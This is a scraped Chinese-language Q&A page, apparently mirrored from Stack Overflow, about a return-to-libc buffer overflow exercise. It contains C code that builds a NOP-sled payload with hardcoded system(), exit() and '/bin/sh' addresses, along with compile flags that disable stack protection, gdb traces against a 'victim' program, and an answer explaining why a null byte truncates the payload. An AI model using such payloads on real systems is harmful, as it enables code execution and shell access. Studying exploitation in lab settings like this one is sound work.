- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我使用的是 ubuntu 14.04。所以我有最新的内核。我正在尝试返回 libc 方法。
这是我创建环境变量的代码,稍后将其输入到受害者代码
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define BUFFER_SIZE 104
#define NOP 0x90
char systemAddr[] = "\xb0\xe3\xe4\xf7";
char exitAddr[] = "\x00\x14\xe4\xf7";
char bashAddr[] = "\xcc\xd9\xe9\xff";
int main()
{
char *buf;
int bsize = BUFFER_SIZE;
if(!(buf = (char *)malloc(bsize)))
{
printf("can't allocate memory!");
exit(0);
}
memset(buf, NOP, 104);
memcpy(buf, "BUF=", 4);
memcpy(buf + 88, systemAddr, 4 );
memcpy(buf + 92, "\x00\x14\xe4\xf7" , 4); //memcpy(buf + 92, exitAddr, 4);
memcpy(buf + 96, bashAddr, 4);
memcpy(buf + 100, "\x00\x00\x00\x00", 4);
printf("%s \n", buf);
putenv(buf);
system("/bin/bash");
return 0;
}
问题出在这一行,
memcpy(buf + 92, "\x00\x14\xe4\xf7", 4);//memcpy(buf + 92, exitAddr, 4);
在我用 null(\x00) 给出地址后,当我检查 $BUF 时,在 buf+92 位置会看到一些不同的值。最多 88 字节,所有复制均已成功完成。但我未能将 exitAddr 复制到第 92-95 个字节。我认为这是因为开始“\x00”。如果我尝试使用“(如果我给出\xaa\xaa\xaa\xaa 它工作正常)”。工作正常!
我给出了我的程序的 gdb 输出
(gdb) run
Starting program: /home/Stack Overflow/From tube/Ret2Libc
Breakpoint 1, main () at Ret2Libc.c:40
40 memcpy(buf + 100, "\x00\x00\x00\x00", 4);
(gdb) x/1s buf
0xffffcf1c: "BUF=", '\220' <repeats 84 times>, "\260\343\344", <incomplete sequence \367>
(gdb) x/4xw buf+88
0xffffcf74: 0xf7e4e3b0 0xf7e41400 0xffe9d9cc 0x90909090
(gdb) s
Breakpoint 2, main () at Ret2Libc.c:43
43 putenv(buf);
(gdb) x/4xw buf+88
0xffffcf74: 0xf7e4e3b0 0xf7e41400 0xffe9d9cc 0x000000
(gdb) s
Breakpoint 3, main () at Ret2Libc.c:44
44 system("/bin/sh");
(gdb) x/4xw buf+88
0xffffcf74: 0xf7e4e3b0 0xf7e41400 0xffe9d9cc 0x000000
(gdb) s
$ $BUF
/bin/sh: 1: ����������������������������������������������������������������������������������������: not found
$ exit
Breakpoint 4, main () at Ret2Libc.c:47
47 return 0;
(gdb) x/4xw buf+88
0xffffcf74: 0xf7e4e3b0 0xf7e41400 0xffe9d9cc 0x000000
(gdb) s
48 }
(gdb) x/4xw buf+88
0xffffcf74: 0xf7e4e3b0 0xf7e41400 0xffe9d9cc 0x000000
(gdb) c
Continuing.
[Inferior 1 (process 4808) exited normally]
(gdb)
你注意到了吗。 “buf 变量直到最后都具有实际值”。
现在,当我执行受害者代码时,如下所示,
$ gcc -ggdb -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o Ret2Libc Ret2Libc.c
Notebook-PC:$ ./Ret2Libc
$ $BUF
/bin/sh: 1: ����������������������������������������������������������������������������������������: not found
$ gdb ./victim
Reading symbols from ./victim...done.
(gdb) b 12
Breakpoint 1 at 0x804848e: file victim.c, line 12.
(gdb) run $BUF
Starting program: /home/mj/victim $BUF
aa
Breakpoint 1, main (argc=2, argv=0xffffcf24) at victim.c:12
12 strcpy(array, argv[1] );
(gdb) x/8xw argv[1]
0xffffd156: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd166: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) x/8xw argv[1]+88
0xffffd1ae: 0x47445800 0x4e54565f 0x00373d52 0x5f474458
0xffffd1be: 0x53534553 0x5f4e4f49 0x633d4449 0x53530032
(gdb) x/8xw argv[1]+84
0xffffd1aa: 0xf7e4e3b0 0x47445800 0x4e54565f 0x00373d52
0xffffd1ba: 0x5f474458 0x53534553 0x5f4e4f49 0x633d4449
这里我们可以看到从argv 1 +88开始数据发生了变化。怎么样?是因为exitAddr中的“\x00”吗?我该如何克服这个问题?
最佳答案
正如 @mafso 指出的,putenv(buf)
需要一个字符串。在 C 中,字符串是一个 char
数组,直到并包括终止符 '\0'
。
所以当buf = "BUF=...\x00\x14\xe4\xf7"; putenv(buf);
,就好像 buf = "BUF=...";
已被编码。
建议将 0x0014e4f7
的所需地址编码为 4 个 char
,而建议将地址编码为 8 个十六进制字符 buf = "BUF=...0014e4f7";
当然,解码地址需要考虑新的格式。
关于c - 为什么 putenv(buf) 无法正常工作,因为 memcpy(buf + 92, "\x00\x14\xe4\xf7", 4) 将 a\x00 字节复制到 buf ?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/24516778/
我在Windows 10中使用一些简单的Powershell代码遇到了这个奇怪的问题,我认为这可能是我做错了,但我不是Powershell的天才。 我有这个: $ix = [System.Net.Dn
var urlsearch = "http://192.168.10.113:8080/collective-intellegence/StoreClicks?userid=" + userId +
我有一个非常奇怪的问题,过去两天一直让我抓狂。 我有一个我试图控制的串行设备(LS 100 光度计)。使用设置了正确参数的终端(白蚁),我可以发送命令(“MES”),然后是定界符(CR LF),然后我
我目前正试图让无需注册的 COM 使用 Excel 作为客户端,使用 .NET dll 作为服务器。目前,我只是试图让概念验证工作,但遇到了麻烦。 显然,当我使用 Excel 时,我不能简单地使用与可
我开发了简单的 REST API - https://github.com/pavelpetrcz/MandaysFigu - 我的问题是在本地主机上,WildFly 16 服务器的应用程序运行正常。
我遇到了奇怪的情况 - 从 Django shell 创建一些 Mongoengine 对象是成功的,但是从 Django View 创建相同的对象看起来成功,但 MongoDB 中没有出现任何数据。
我是 flask 的新手,只编写了一个相当简单的网络应用程序——没有数据库,只是一个航类搜索 API 的前端。一切正常,但为了提高我的技能,我正在尝试使用应用程序工厂和蓝图重构我的代码。让它与 pus
我的谷歌分析 JavaScript 事件在开发者控制台中运行得很好。 但是当从外部 js 文件包含在页面上时,它们根本不起作用。由于某种原因。 例如; 下面的内容将在包含在控制台中时运行。但当包含在单
这是一本名为“Node.js 8 the Right Way”的书中的任务。你可以在下面看到它: 这是我的解决方案: 'use strict'; const zmq = require('zeromq
我正在阅读文本行,并创建其独特单词的列表(在将它们小写之后)。我可以使它与 flatMap 一起工作,但不能使它与 map 的“子”流一起工作。 flatMap 看起来更简洁和“更好”,但为什么 di
我正在编写一些 PowerShell 脚本来进行一些构建自动化。我发现 here echo $? 根据前面的语句返回真或假。我刚刚发现 echo 是 Write-Output 的别名。 写主机 $?
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 4年前关闭。 Improve thi
我将一个工作 View Controller 类从另一个项目复制到一个新项目中。我无法在新项目中加载 View 。在旧项目中我使用了presentModalViewController。在新版本中,我
我对 javascript 很陌生,所以很难看出我哪里出错了。由于某种原因,我的功能无法正常工作。任何帮助,将不胜感激。我尝试在外部 js 文件、头部/主体中使用它们,但似乎没有任何效果。错误要么出在
我正在尝试学习Flutter中的复选框。 问题是,当我想在Scaffold(body :)中使用复选框时,它正在工作。但我想在不同的地方使用它,例如ListView中的项目。 return Cente
我们当前使用的是 sleuth 2.2.3.RELEASE,我们看不到在 http header 中传递的 userId 字段没有传播。下面是我们的代码。 BaggageField REQUEST_I
我有一个组合框,其中包含一个项目,比如“a”。我想调用该组合框的 Action 监听器,仅在手动选择项目“a”完成时才调用。我也尝试过 ItemStateChanged,但它的工作原理与 Action
你能看一下照片吗?现在,一步前我执行了 this.interrupt()。您可以看到 this.isInterrupted() 为 false。我仔细观察——“这个”没有改变。它具有相同的 ID (1
我们当前使用的是 sleuth 2.2.3.RELEASE,我们看不到在 http header 中传递的 userId 字段没有传播。下面是我们的代码。 BaggageField REQUEST_I
我正在尝试在我的网站上设置一个联系表单,当有人点击发送时,就会运行一个作业,并在该作业中向所有管理员用户发送通知。不过,我在失败的工作表中不断收到此错误: Illuminate\Database\El
我是一名优秀的程序员,十分优秀!